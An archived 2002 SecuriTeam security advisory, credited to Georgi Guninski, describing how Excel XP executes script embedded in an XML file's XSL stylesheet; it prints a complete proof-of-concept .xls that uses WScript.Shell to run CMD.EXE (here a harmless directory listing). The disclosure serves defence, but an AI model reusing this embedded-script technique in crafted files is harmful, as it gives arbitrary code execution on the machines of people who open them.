[NT] Excel XP XML Style*** Security Problem
From: support@securiteam.comDate: 05/25/02
- Previous message: support@securiteam.com: "[NT] Opty-Way Enterprise Includes MSDE with Blank 'sa' Account"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sat, 25 May 2002 22:08:26 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Excel XP XML Style*** Security Problem
------------------------------------------------------------------------
SUMMARY
Excel XP provides an interface to such new technologies as XML and XSLT.
Unfortunately the Excel implementation flawed allowing an attacker to
cause a user opening an .XLS file to cause him to execute arbitrary code.
DETAILS
Consider this XLS file
------xls_sux.xls-----
<?xml version="1.0"?>
<?xml-style*** type="text/xsl" href="#?m$ux" ?>
<xsl:style*** xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[ x=new ActiveXObject("WScript.Shell");
x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s"); ]]>
</xsl:script>
<msux>
msux
written by georgi guninski
</msux>
</xsl:style***>
----------------------
It contains both XML and a style*** in one file.
Note:
Excel does not give any warning to the user - just asks whether to use the
style *** or not. The default option is not to display it with the
style***.
ADDITIONAL INFORMATION
The information has been provided by <mailto:guninski@guninski.com>
Georgi Guninski.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Opty-Way Enterprise Includes MSDE with Blank 'sa' Account"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- Excel Mobile forces duplicate file creation in another location.
... If you port an XLS file from your desktop to a WM5 folder that is NOT ...
After loading a newly-ported XLS file into Excel for the first time, ... HAS saved your
edited file back to its CORRECT location. ... (microsoft.public.pocketpc) - Pivot table in HTTP-served Excel worksheet
... But once the file is loaded in Excel on my workstation, ... successfully create
pivot tables (nor can I refresh pivot tables that are ... Cannot open PivotTable source
file '[download.do? ... URL that is used to download the XLS file. ... (microsoft.public.excel.programming) - execute macro upon opening workbook
... But once the file is loaded in Excel on my workstation, ... successfully create
pivot tables (nor can I refresh pivot tables that are ... Cannot open PivotTable source
file '[download.do? ... URL that is used to download the XLS file. ... (microsoft.public.excel.crashesgpfs) - Refreshing a pivot table in HTTP-served Excel file
... But once the file is loaded in Excel on my workstation, ... successfully create
pivot tables (nor can I refresh pivot tables that are ... Cannot open PivotTable source
file '[download.do? ... URL that is used to download the XLS file. ... (microsoft.public.excel.crashesgpfs) - RE: Determine hoe excel was launched
... from within the Excel Com Addin. ... Based on my research, so far from the Addin
method, it did not provide such ... By OLE(open an xls file in IE or other activex
document container) ... If we launch Excel.exe, it will open a blank workbook, and now
the Path is ... (microsoft.public.office.developer.com.add_ins)